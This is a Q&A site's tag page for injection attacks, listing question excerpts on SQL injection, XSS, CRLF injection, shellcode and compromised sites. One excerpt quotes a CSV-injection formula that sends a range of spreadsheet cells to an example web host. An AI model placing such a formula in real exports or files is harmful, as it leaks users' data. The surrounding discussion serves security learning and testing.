Questions tagged [injection]

inserting malicious content, usually code (like SQL, Javascript) into a vulnerable application. Is used only if there is no more specific injection tag available (see tag wiki)

Injection is inserting malicious content, usually code (like SQL, Javascript) into a vulnerable application.

Tag usage:

Should be used only for injection attacks where there is no more specific injection tag available.

408 questions
11
votes
3 answers

Is it secure to be using LDAP, or is LDAPS the only secure option?

I am currently using an LDAP setup. I am wondering if it is secure from Man-in-the-middle attacks or other vulnerabilities?
mrplow911
  • 113
  • 1
  • 1
  • 4
11
votes
2 answers

How reliable is ASP.NET's Request Validation feature?

ASP.NET offers an extra layer to protect your application from XSS attacks and injection in general which is called Request validation. On their official topic, they mention that: Even if you're using request validation, you should HTML-encode text…
Simon
  • 3,182
  • 4
  • 26
  • 38
11
votes
2 answers

What does this injected code do?

One of my sites has just been hacked as this code has been inserted into random(?) files and places within the files. Does anyone understand what it is trying to do? I would welcome anything that may assist me with finding out how it got on. Also,…
Keith B
  • 113
  • 1
  • 4
11
votes
2 answers

Facebook's warning of self-xss

I happened to open my browser console on Facebook recently and was greeted with the following message. Stop! This is a browser feature intended for developers. If someone told you to copy and paste something here to enable a Facebook feature or…
Luke
  • 223
  • 2
  • 7
10
votes
7 answers

Cheating or service disruption by altering client-side code

A reasonably white-hatted hacker has demonstrated the ability to insert text of his own choosing into the communication between a java applet and a web based server. Not a simple MITM attack, but using a tool like "JavaSnoop" to tap into the…
ddyer
  • 1,974
  • 1
  • 12
  • 20
10
votes
2 answers

Security of Log Files - Injecting malicious code in Log files

As part of my course project I'm trying to understand various security frameworks and best practices. One of the very popular approach is to maintain Logs. My question is about the security of the log file itself. Since most of the logs provide a…
acoolguy
  • 133
  • 1
  • 7
10
votes
1 answer

Cracking PCI terminal using a trojan based on the card

I have come across an article which states the following: According to MWR InfoSecurity, cybercriminals can use fake cards containing a software code to gain access not only to a customer's PIN and primary account numbers shown on the front of…
Kyle Rosendo
  • 3,965
  • 4
  • 18
  • 17
10
votes
8 answers

My ISP (BSNL India) is injecting ads using Phozeca which spoils websites and makes them unresponsive, can anything be done?

I've been recently having a problem where my ISP (BSNL India) has been injecting ads/weird Javascript Tracking codes onto my browser, making the website unusable and unresponsive. I've written an article regarding this too:…
HDG390x
  • 101
  • 1
  • 5
9
votes
4 answers

Is it possible to Exploit this Line Feed?

During a security assessment on a website I found a a redirection link that was reflecting the values in the Location header. The first thing that came to my mind was CRLF injection so I tried a few variation of "%0a" and managed to include my…
Mico
  • 377
  • 3
  • 16
9
votes
9 answers

Is testing for SQL injection vulnerabilities still relevant in modern web applications?

First some background: I'm an Infrastructural Engineer with 5 years of experience mainly in Virtualization and Networking. I've spent the past year doing a lot of self study about security, passed the Security+, read Web Applications Hackers…
Mico
  • 377
  • 3
  • 16
9
votes
1 answer

Understanding boolean based SQL injection

I am trying to understand the concept of Boolean Based Blind SQL Injection. I have gone through OWASP Guide To SQLi to understand it. However I am confused with how exactly does it work. Below is what I understand from the article in the above link.…
qre0ct
  • 1,492
  • 3
  • 19
  • 30
9
votes
2 answers

DOM Based XSS attacks: what is the most dangerous example?

I knew that XSS attacks (“non-persistent” and “persistent”) can hijack user session, deface websites, conduct phishing attack, etc. However, I can't understand what is dangerous of DOM Based XSS if its not able to (Hijack session, click jacking,…
Akam
  • 1,327
  • 3
  • 14
  • 23
9
votes
1 answer

Better way to import Win32 APIs from injected shellcode

I'm injecting native x86 code into a .NET application, via a TLS callback in the binary image. Unfortunately, .NET executables only import mscorlib.dll within the PE, and have kernel32.dll mapped automatically into the memory space at runtime. I…
Polynomial
  • 132,208
  • 43
  • 298
  • 379
9
votes
2 answers

Does "=cmd" CSV injection still exist in 2020?

I'm currently pentesting a web application on which a user can generate a CSV. I managed to exfiltrate data via CSV injection using a payload such as: =WEBSERVICE(CONCAT("http://example.com/", CONCAT(A1:A50)) I am now trying to create a "more…
Scaum
  • 271
  • 2
  • 7
9
votes
1 answer

Sucuri detects malware on wordpress but I can't find the malicious code

Yesterday I got a report asking us to check some wordpress website because the person's antivirus blocked said web. I ran the Sucuri Site Check and it indeed detects malware: "Known javascript malware:…
Sephy
  • 91
  • 2
1
2
3
27 28